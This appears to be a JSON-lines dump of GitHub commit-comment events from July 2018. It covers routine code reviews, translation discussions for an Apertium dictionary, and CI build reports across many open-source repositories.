{"id":"8012520473","type":"CommitCommentEvent","actor":{"login":"maxkfranz"},"repo":{"name":"cytoscape/cytoscape.js"},"payload":{"comment":{"id":29819466,"position":null,"line":null,"path":null,"commit_id":"b7422252647ad0ff9bfe4a10508259885e8fa92d","created_at":"2018-07-24T20:16:52Z","updated_at":"2018-07-24T20:16:52Z","author_association":"MEMBER","body":"Ref #1224 "}},"created_at":"2018-07-24T20:16:52Z"}
{"id":"8012522020","type":"CommitCommentEvent","actor":{"login":"mcallegari"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29819472,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-24T20:17:11Z","updated_at":"2018-07-24T20:17:11Z","author_association":"OWNER","body":"What about Clay Paky Alpha Beam 300 then ?\r\nhttps://github.com/mcallegari/qlcplus/blob/master/resources/fixtures/Clay_Paky/Clay-Paky-Alpha-Beam-300.qxf#L17\r\nWhat is the rule to use CMY or color wheel ?"}},"created_at":"2018-07-24T20:17:11Z"}
{"id":"8012522876","type":"CommitCommentEvent","actor":{"login":"k3yavi"},"repo":{"name":"10XGenomics/rust-boomphf"},"payload":{"comment":{"id":29819473,"position":213,"line":515,"path":"src/lib.rs","commit_id":"21f76369347f3b36bca48f559f8f94e735205d75","created_at":"2018-07-24T20:17:21Z","updated_at":"2018-07-24T20:17:21Z","author_association":"COLLABORATOR","body":"Right I agree w/ everything above but `node` is not a iterator, we have to call `node.into_iter()`. https://github.com/10XGenomics/rust-debruijn/blob/avi/src/graph.rs#L946"}},"created_at":"2018-07-24T20:17:21Z"}
{"id":"8012529466","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29819485,"position":13,"line":871,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"0d141319e20a9365e28421bd5acf22f1ed254d6e","created_at":"2018-07-24T20:18:42Z","updated_at":"2018-07-24T20:18:42Z","author_association":"COLLABORATOR","body":"Could this just be a noun meaning kibir?"}},"created_at":"2018-07-24T20:18:42Z"}
{"id":"8012530106","type":"CommitCommentEvent","actor":{"login":"lduguid"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29819487,"position":null,"line":null,"path":null,"commit_id":"106915097925b9527069bd659dd340cdfc9b3d76","created_at":"2018-07-24T20:18:49Z","updated_at":"2018-07-24T20:18:49Z","author_association":"NONE","body":"I have no experience with MariaDB, however, it is possible that if you came from 10.1.6 (or before) and 'updated' to 10.1.7 or greater, the update process may have kept the original default of 1MB (among other defaults) whereas a fresh install would have used 4MB or greater etc.  This is just speculation on my behalf but may explain why this default remained on 1MB  with your greater then 10.1.6 install."}},"created_at":"2018-07-24T20:18:49Z"}
{"id":"8012532026","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29819491,"position":null,"line":null,"path":null,"commit_id":"eabd4d59642a647988802228e7d48fbbeb5cdb29","created_at":"2018-07-24T20:19:12Z","updated_at":"2018-07-24T20:19:12Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T20:19:12Z"}
{"id":"8012536950","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29819503,"position":75,"line":933,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"0d141319e20a9365e28421bd5acf22f1ed254d6e","created_at":"2018-07-24T20:20:12Z","updated_at":"2018-07-24T20:20:12Z","author_association":"COLLABORATOR","body":"Could this mean justice? Sorry for nitpicking :/"}},"created_at":"2018-07-24T20:20:12Z"}
{"id":"8012537880","type":"CommitCommentEvent","actor":{"login":"gallais"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29819505,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T20:20:21Z","updated_at":"2018-07-24T20:20:21Z","author_association":"MEMBER","body":"I think your `Level.FromNat` suggestion works (and we can probably add similar modules\r\nfor `Integer`, `Rational`, and `Fin` to provide users with instances enabling them to use\r\n[literal overloading](https://agda.readthedocs.io/en/v2.5.4.1/language/literal-overloading.html?highlight=fromnat)).\r\n\r\nDo go ahead and submit a PR if you don't mind. Otherwise I'll try to do it in the coming days."}},"created_at":"2018-07-24T20:20:21Z"}
{"id":"8012539144","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29819507,"position":80,"line":938,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"0d141319e20a9365e28421bd5acf22f1ed254d6e","created_at":"2018-07-24T20:20:37Z","updated_at":"2018-07-24T20:20:37Z","author_association":"COLLABORATOR","body":"Hıristiyan?"}},"created_at":"2018-07-24T20:20:37Z"}
{"id":"8012545539","type":"CommitCommentEvent","actor":{"login":"bozis92"},"repo":{"name":"RH1CK/CubePlay"},"payload":{"comment":{"id":29819520,"position":null,"line":null,"path":null,"commit_id":"73cd547e483d862a3aecdc7c029b22ab45f4d8e1","created_at":"2018-07-24T20:21:51Z","updated_at":"2018-07-24T20:21:51Z","author_association":"NONE","body":"Não consigo acessar os videos da parte Animes"}},"created_at":"2018-07-24T20:21:51Z"}
{"id":"8012545597","type":"CommitCommentEvent","actor":{"login":"cvilchez67"},"repo":{"name":"cvilchez67/AlevirCS"},"payload":{"comment":{"id":29819522,"position":null,"line":null,"path":null,"commit_id":"84701e97b969083c1b487dc74f43088fcfc64331","created_at":"2018-07-24T20:21:51Z","updated_at":"2018-07-24T20:21:51Z","author_association":"OWNER","body":"well done"}},"created_at":"2018-07-24T20:21:51Z"}
{"id":"8012583838","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29819605,"position":1,"line":1,"path":"Lesson_4/cargo_wagon.rb","commit_id":"46a7f2d4afbc5a5e3e3c770ec440498d5522d22e","created_at":"2018-07-24T20:29:39Z","updated_at":"2018-07-24T20:29:39Z","author_association":"NONE","body":"в задании этого напрямую не указано, но будет правильней , если классы ГрузовойВагон и ПассажирскийВагон будут иметь общего предка\r\n(и еще тема урока \"Интерфейсы, **наследование и полиморфизм**\", будет нелишним еще раз отработать этот функционал)"}},"created_at":"2018-07-24T20:29:39Z"}
{"id":"8012584686","type":"CommitCommentEvent","actor":{"login":"hschweitzer"},"repo":{"name":"hschweitzer/AniList-Plus"},"payload":{"comment":{"id":29819608,"position":null,"line":null,"path":null,"commit_id":"fce170ee796e1a5d24dd01e621899bb9f817745b","created_at":"2018-07-24T20:29:49Z","updated_at":"2018-07-24T20:29:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Utiliser des Mutation Observers à la place des Mutation Events](https://trello.com/c/YgrwnlKf/8-utiliser-des-mutation-observers-%C3%A0-la-place-des-mutation-events)"}},"created_at":"2018-07-24T20:29:49Z"}
{"id":"8012584740","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29819609,"position":75,"line":933,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"0d141319e20a9365e28421bd5acf22f1ed254d6e","created_at":"2018-07-24T20:29:50Z","updated_at":"2018-07-24T20:29:50Z","author_association":"COLLABORATOR","body":"No, is it justice in arabic? This is like \"dad salmak\", as in Ottoman"}},"created_at":"2018-07-24T20:29:50Z"}
{"id":"8012585442","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29819610,"position":null,"line":null,"path":null,"commit_id":"db1d3282b3a10309a24e2fb2cf07c52bd19be313","created_at":"2018-07-24T20:29:58Z","updated_at":"2018-07-24T20:29:58Z","author_association":"COLLABORATOR","body":"@smiths a) Is this the correct implementation? The old module that dealt with constants used a class, but that seems unnecessary to me.\r\n\r\nb) Should I comment every line with what the variable is when that information is captured in the SRS, MIS, etc.?"}},"created_at":"2018-07-24T20:29:58Z"}
{"id":"8012586949","type":"CommitCommentEvent","actor":{"login":"danintel"},"repo":{"name":"danintel/sawtooth-faq"},"payload":{"comment":{"id":29819615,"position":null,"line":null,"path":null,"commit_id":"763211d5136038bf8e07d92a43c0f1eaa67e4d85","created_at":"2018-07-24T20:30:16Z","updated_at":"2018-07-24T20:30:16Z","author_association":"OWNER","body":"Thank you for the fix!"}},"created_at":"2018-07-24T20:30:16Z"}
{"id":"8012588091","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/Node-Express-Lab"},"payload":{"comment":{"id":29819619,"position":null,"line":null,"path":null,"commit_id":"8f483a725bc3682dcd15409619abb141404f6168","created_at":"2018-07-24T20:30:28Z","updated_at":"2018-07-24T20:30:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [When the client makes a GET request to /api/posts:](https://trello.com/c/kaTtidTi/2-when-the-client-makes-a-get-request-to-api-posts)"}},"created_at":"2018-07-24T20:30:28Z"}
{"id":"8012588751","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29819622,"position":13,"line":871,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"0d141319e20a9365e28421bd5acf22f1ed254d6e","created_at":"2018-07-24T20:30:36Z","updated_at":"2018-07-24T20:30:36Z","author_association":"COLLABORATOR","body":"kibir is تەكەببۇرلۇق\r\nI think they mixed it up :D"}},"created_at":"2018-07-24T20:30:36Z"}
{"id":"8012590731","type":"CommitCommentEvent","actor":{"login":"avaldebe"},"repo":{"name":"SV-Zanshin/INA"},"payload":{"comment":{"id":29819628,"position":62,"line":118,"path":"src/INA.cpp","commit_id":"83f2af92ef45f924f9ebbebe9c19c7cfe144ece2","created_at":"2018-07-24T20:30:58Z","updated_at":"2018-07-24T20:30:58Z","author_association":"CONTRIBUTOR","body":"should be `inaEE` instead of `ina`"}},"created_at":"2018-07-24T20:30:58Z"}
{"id":"8012591409","type":"CommitCommentEvent","actor":{"login":"jevanjones"},"repo":{"name":"jholtom/PICS"},"payload":{"comment":{"id":29819633,"position":1495,"line":1543,"path":"ElysiumCode/core/cmds.c","commit_id":"4fc9cdc318d340b89b25cca20eb31f9ef2746f6d","created_at":"2018-07-24T20:31:07Z","updated_at":"2018-07-24T20:31:07Z","author_association":"NONE","body":"So what if !hrd.reply we'll try to use _reply_buff_ later on w/o it having been created"}},"created_at":"2018-07-24T20:31:07Z"}
{"id":"8012592151","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29819635,"position":4,"line":4,"path":"Lesson_4/cargo_train.rb","commit_id":"46a7f2d4afbc5a5e3e3c770ec440498d5522d22e","created_at":"2018-07-24T20:31:15Z","updated_at":"2018-07-24T20:31:15Z","author_association":"NONE","body":"лучше эту переменную инициализировать в родителе, а из наследников родителю просто передавать ее значение (вместе с аргументом \"номер\")"}},"created_at":"2018-07-24T20:31:15Z"}
{"id":"8012594732","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819641,"position":8,"line":8,"path":"Lesson2/hash_vowel.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:31:47Z","updated_at":"2018-07-24T20:31:47Z","author_association":"NONE","body":"Тут рекомендую использовать метод each_with_index массива. Он возвращает при каждой итерации и элемент и его индекс. Тогда можно будет избавить от num и его обработки."}},"created_at":"2018-07-24T20:31:47Z"}
{"id":"8012597165","type":"CommitCommentEvent","actor":{"login":"levymtmr"},"repo":{"name":"levymtmr/work-at-olist"},"payload":{"comment":{"id":29819647,"position":null,"line":null,"path":null,"commit_id":"9dabe07b3ae63127911b783d4581728d33d910bb","created_at":"2018-07-24T20:32:16Z","updated_at":"2018-07-24T20:32:16Z","author_association":"OWNER","body":"@lincolwn \r\nPelo o que entendi, a pessoa poderia pesquisar a ligação passando um parametro como o call_id, para saber a descricao da uma ligação, e o bills seria uma pesquisa por numero e periodo(só se o periodo for passado) que traria um historico de ligações para determinado numero."}},"created_at":"2018-07-24T20:32:16Z"}
{"id":"8012597572","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29819649,"position":80,"line":938,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"0d141319e20a9365e28421bd5acf22f1ed254d6e","created_at":"2018-07-24T20:32:21Z","updated_at":"2018-07-24T20:32:21Z","author_association":"COLLABORATOR","body":"Yes but I thought Mesihi would be better in İncil's contexts. I remember my Turkish incil using Mesihi too, since \"christianity\" wasn't a thing and it was more about \"believing in the mesih\" (=mesihî)."}},"created_at":"2018-07-24T20:32:21Z"}
{"id":"8012598539","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29819652,"position":75,"line":933,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"0d141319e20a9365e28421bd5acf22f1ed254d6e","created_at":"2018-07-24T20:32:32Z","updated_at":"2018-07-24T20:32:32Z","author_association":"COLLABORATOR","body":"I think dād is justice in persian and consequently in the wider islamic\nworld, so I assumed that was the meaning, cool\n\nOn Tue, Jul 24, 2018, 11:29 PM koguzhan <notifications@github.com> wrote:\n\n> No, is it justice in arabic? This is like \"dad salmak\", as in Ottoman\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/0d141319e20a9365e28421bd5acf22f1ed254d6e#commitcomment-29819609>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2tOmrwYo6wfWG75QExJIADe0DuMFks5uJ4O-gaJpZM4Vdu95>\n> .\n>\n"}},"created_at":"2018-07-24T20:32:32Z"}
{"id":"8012599205","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819653,"position":8,"line":8,"path":"Lesson2/hash_vowel.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:32:42Z","updated_at":"2018-07-24T20:32:42Z","author_association":"NONE","body":"можно использовать конструкцию `each.with_index(1)` (обрати внимание на точку - это 2 метода подряд вызваны)"}},"created_at":"2018-07-24T20:32:42Z"}
{"id":"8012599373","type":"CommitCommentEvent","actor":{"login":"avaldebe"},"repo":{"name":"SV-Zanshin/INA"},"payload":{"comment":{"id":29819655,"position":74,"line":137,"path":"src/INA.cpp","commit_id":"83f2af92ef45f924f9ebbebe9c19c7cfe144ece2","created_at":"2018-07-24T20:32:44Z","updated_at":"2018-07-24T20:32:44Z","author_association":"CONTRIBUTOR","body":"`inaEE` instead if `ina`, also the line `inaEE = ina;` got lost in the merge"}},"created_at":"2018-07-24T20:32:44Z"}
{"id":"8012600943","type":"CommitCommentEvent","actor":{"login":"adrianbg"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29819658,"position":52,"line":64,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T20:33:02Z","updated_at":"2018-07-24T20:33:02Z","author_association":"CONTRIBUTOR","body":"90% but not 10%?"}},"created_at":"2018-07-24T20:33:02Z"}
{"id":"8012601482","type":"CommitCommentEvent","actor":{"login":"msuchard"},"repo":{"name":"beast-dev/beast-mcmc"},"payload":{"comment":{"id":29819659,"position":null,"line":null,"path":null,"commit_id":"e29fb0f9c991a62889c0a5bc4c8cc8ff5cf00fae","created_at":"2018-07-24T20:33:09Z","updated_at":"2018-07-24T20:33:09Z","author_association":"MEMBER","body":"@xji3 -- awesome job!  Removing `code duplication` is so satisfying."}},"created_at":"2018-07-24T20:33:09Z"}
{"id":"8012602354","type":"CommitCommentEvent","actor":{"login":"gacholio"},"repo":{"name":"eclipse/openj9"},"payload":{"comment":{"id":29819664,"position":null,"line":null,"path":null,"commit_id":"281545a7f56c0443f08715d99571c59072b399e0","created_at":"2018-07-24T20:33:18Z","updated_at":"2018-07-24T20:33:18Z","author_association":"CONTRIBUTOR","body":"Why would this be necessary?  Shouldn't the offset redirect there from the vTable?"}},"created_at":"2018-07-24T20:33:18Z"}
{"id":"8012607793","type":"CommitCommentEvent","actor":{"login":"thephilwells"},"repo":{"name":"thephilwells/maker-week-device"},"payload":{"comment":{"id":29819671,"position":null,"line":null,"path":null,"commit_id":"39e7a34e28fee40eef4819daf63f3d52cf5b2c2e","created_at":"2018-07-24T20:34:26Z","updated_at":"2018-07-24T20:34:26Z","author_association":"OWNER","body":"Fixes #8 "}},"created_at":"2018-07-24T20:34:26Z"}
{"id":"8012608588","type":"CommitCommentEvent","actor":{"login":"sergeyk"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29819673,"position":37,"line":50,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T20:34:35Z","updated_at":"2018-07-24T20:34:35Z","author_association":"NONE","body":"The error that used to be there would be from this:\r\n\r\n```python\r\npandas = namedtuple('pandas', ['DataFrame'])\r\nx = 3\r\nisinstance(x, pandas.dataframe)\r\n# TypeError: isinstance() arg 2 must be a type or tuple of types\r\n```"}},"created_at":"2018-07-24T20:34:35Z"}
{"id":"8012617026","type":"CommitCommentEvent","actor":{"login":"martha-thomae"},"repo":{"name":"DDMAL/CMN-MEI_to_MensuralMEI_Translator"},"payload":{"comment":{"id":29819681,"position":101,"line":149,"path":"README.md","commit_id":"75810ad416f9cb14f2fb51f3a9d0ddd88c6586bf","created_at":"2018-07-24T20:36:13Z","updated_at":"2018-07-24T20:36:13Z","author_association":"COLLABORATOR","body":"It might be better to include as examples, pieces that have changes in mensuration within a voice. Something like **M18** when it works with Verovio.\r\n\r\nmensural_meidoc = MensuralTranslation(cmn_meidoc, \"ars_nova\", [[\"ipip\"], [\"ipip\"], [\"ipip\", \"33\", \"iipp\"]])\r\n  mensural_meidoc.getModifiedNotes('partial imperfection')"}},"created_at":"2018-07-24T20:36:13Z"}
{"id":"8012621201","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819686,"position":21,"line":21,"path":"Lesson2/number_month_year.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:37:04Z","updated_at":"2018-07-24T20:37:04Z","author_association":"NONE","body":"да, это работает. Можно решить \"красивее\" используя метод sum добавленный в руби 2.5.0. А вместо slice например, можно использовать first с аргументом. Проверка месяца кстати не понадобится"}},"created_at":"2018-07-24T20:37:04Z"}
{"id":"8012621799","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29819691,"position":null,"line":null,"path":null,"commit_id":"0c21be7f255eaa1b22bb0f1e63d22b6ed17d0de4","created_at":"2018-07-24T20:37:11Z","updated_at":"2018-07-24T20:37:11Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/mono-2018-04/3/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/mono-2018-04/3//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-04/0c21be7f255eaa1b22bb0f1e63d22b6ed17d0de4/3/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-04/0c21be7f255eaa1b22bb0f1e63d22b6ed17d0de4/3/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-04/0c21be7f255eaa1b22bb0f1e63d22b6ed17d0de4/3/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-04/0c21be7f255eaa1b22bb0f1e63d22b6ed17d0de4/3/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>5 tests failed, 0 tests skipped, 220 tests passed.</summary>\n\n## Failed tests\n\n * apitest/Mac Classic/All: TimedOut (Execution timed out after 1200 seconds.)\n * introspection/iOS Unified 64-bits - simulator/Debug: TimedOut\n * monotouch-test/watchOS - simulator/Debug: TimedOut\n * System.Json/watchOS - simulator/Debug: Failed\n * MTouch tests/NUnit: TimedOut (Execution timed out after 0 minutes.)\n</details>\n"}},"created_at":"2018-07-24T20:37:11Z"}
{"id":"8012622672","type":"CommitCommentEvent","actor":{"login":"andrasnyarai"},"repo":{"name":"marcidelux/kkhc"},"payload":{"comment":{"id":29819693,"position":6,"line":9,"path":"server/router/controllers/AdminController.js","commit_id":"dc8d56ec0590805d23a360da095f5b8f16d6dc76","created_at":"2018-07-24T20:37:22Z","updated_at":"2018-07-24T20:37:22Z","author_association":"COLLABORATOR","body":"seed - ige"}},"created_at":"2018-07-24T20:37:22Z"}
{"id":"8012626564","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819700,"position":26,"line":26,"path":"Lesson2/sum_for_purchases.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:38:08Z","updated_at":"2018-07-24T20:38:08Z","author_association":"NONE","body":"Тут не нужна пустая строка."}},"created_at":"2018-07-24T20:38:08Z"}
{"id":"8012627912","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819703,"position":25,"line":25,"path":"Lesson2/sum_for_purchases.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:38:23Z","updated_at":"2018-07-24T20:38:23Z","author_association":"NONE","body":"про \"новый\" синтаксис писал уже выше"}},"created_at":"2018-07-24T20:38:23Z"}
{"id":"8012628199","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"jmarais/protobuf-1"},"payload":{"comment":{"id":29819705,"position":null,"line":null,"path":null,"commit_id":"b0e1c3ce4e876c41eb22fd16e83089826845de8a","created_at":"2018-07-24T20:38:26Z","updated_at":"2018-07-24T20:38:26Z","author_association":"NONE","body":"We're going to have to revert this change. This is breaking a lot of targets that use `SetDeterministic` along with custom marshalers (where all the custom marshalers were already deterministic). I think we will have to go with the position that custom marshalers are most likely deterministic and if they aren't, well, bleh. The situation is unfortunate."}},"created_at":"2018-07-24T20:38:26Z"}
{"id":"8012633963","type":"CommitCommentEvent","actor":{"login":"AlbertLeeee"},"repo":{"name":"CptCold123/SaitFTCTeam1"},"payload":{"comment":{"id":29819714,"position":null,"line":null,"path":null,"commit_id":"78d7696638a2111bb8db5da9c408d85cdf9869d2","created_at":"2018-07-24T20:39:36Z","updated_at":"2018-07-24T20:39:36Z","author_association":"COLLABORATOR","body":"y u delete im first"}},"created_at":"2018-07-24T20:39:36Z"}
{"id":"8012635240","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819717,"position":30,"line":30,"path":"Lesson2/sum_for_purchases.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:39:52Z","updated_at":"2018-07-24T20:39:52Z","author_association":"NONE","body":"Не нужно \"перебарщивать\" с пустыми строками. Так метод как-то расползается"}},"created_at":"2018-07-24T20:39:52Z"}
{"id":"8012636076","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29819718,"position":null,"line":null,"path":null,"commit_id":"8a2b9187aacfca9ad51a63ae9c4ef5428c9c3187","created_at":"2018-07-24T20:40:03Z","updated_at":"2018-07-24T20:40:03Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [1913clamav](https://1913clamav-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/clamav](https://1913clamav-static-docs.pantheonsite.io/docs/clamav)\n- [source/docs/assets/images/clamav-detection.png](https://github.com/pantheon-systems/documentation/commit/8a2b9187aacfca9ad51a63ae9c4ef5428c9c3187/source/docs/assets/images/clamav-detection.png)\n- [source/docs/assets/images/clamav-settings.png](https://github.com/pantheon-systems/documentation/commit/8a2b9187aacfca9ad51a63ae9c4ef5428c9c3187/source/docs/assets/images/clamav-settings.png)\n"}},"created_at":"2018-07-24T20:40:03Z"}
{"id":"8012637648","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819720,"position":33,"line":33,"path":"Lesson2/sum_for_purchases.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:40:21Z","updated_at":"2018-07-24T20:40:21Z","author_association":"NONE","body":"Когда у нас блок многострочный правильно использовать do end, а не {}"}},"created_at":"2018-07-24T20:40:21Z"}
{"id":"8012639025","type":"CommitCommentEvent","actor":{"login":"wc-duck"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29819721,"position":null,"line":null,"path":null,"commit_id":"c192a6d1900b7cdcbf521b524548db11c4c25818","created_at":"2018-07-24T20:40:38Z","updated_at":"2018-07-24T20:40:38Z","author_association":"CONTRIBUTOR","body":"The tests actually produce something... and errorcode 0 for success 1 otherwise!\r\nIf it were to produce an output I would have to remove that output each time I want to re-run the tests for debugging for example.\r\nFor the valgrind jobs it just outputs to stdout... sure I could redirect that to a file but that would just make my work worse =/"}},"created_at":"2018-07-24T20:40:38Z"}
{"id":"8012639856","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29819724,"position":null,"line":null,"path":null,"commit_id":"36a9dd50f8a4e0685485d57121cf47019dd5646a","created_at":"2018-07-24T20:40:48Z","updated_at":"2018-07-24T20:40:48Z","author_association":"COLLABORATOR","body":"Puzzle `273-9b2b9d3f` discovered in   [`shopelectro/views/catalog.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/views/catalog.py)   and submitted as #444. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-24T20:40:48Z"}
{"id":"8012639943","type":"CommitCommentEvent","actor":{"login":"wenkokke"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29819726,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T20:40:49Z","updated_at":"2018-07-24T20:40:49Z","author_association":"NONE","body":"I created a pull request based on `Level.FromNat`."}},"created_at":"2018-07-24T20:40:49Z"}
{"id":"8012640091","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29819727,"position":null,"line":null,"path":null,"commit_id":"36a9dd50f8a4e0685485d57121cf47019dd5646a","created_at":"2018-07-24T20:40:51Z","updated_at":"2018-07-24T20:40:51Z","author_association":"COLLABORATOR","body":"Puzzle `273-4fe77e3c` discovered in   [`shopelectro/models.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/models.py)   and submitted as #445. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-24T20:40:51Z"}
{"id":"8012647099","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819736,"position":33,"line":33,"path":"Lesson2/sum_for_purchases.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:42:13Z","updated_at":"2018-07-24T20:42:13Z","author_association":"NONE","body":"supplies - не совсем подходит. Тут у нас должно быть единственное число, потому-что мы проходимся по каждому элементу. Лучше назвать например item"}},"created_at":"2018-07-24T20:42:13Z"}
{"id":"8012648136","type":"CommitCommentEvent","actor":{"login":"apertome"},"repo":{"name":"perfsonar/toolkit"},"payload":{"comment":{"id":29819737,"position":null,"line":null,"path":null,"commit_id":"fe66db28e4c86b4548a362d9064a84b1cf630d22","created_at":"2018-07-24T20:42:25Z","updated_at":"2018-07-24T20:42:25Z","author_association":"CONTRIBUTOR","body":"Relates to perfsonar/project#1190"}},"created_at":"2018-07-24T20:42:25Z"}
{"id":"8012648489","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29819739,"position":33,"line":33,"path":"Lesson2/sum_for_purchases.rb","commit_id":"8966cce151e3c1f0c9cfdd07ce9fc547937d5c5f","created_at":"2018-07-24T20:42:30Z","updated_at":"2018-07-24T20:42:30Z","author_association":"NONE","body":"и перед запятой пробел не ставится"}},"created_at":"2018-07-24T20:42:30Z"}
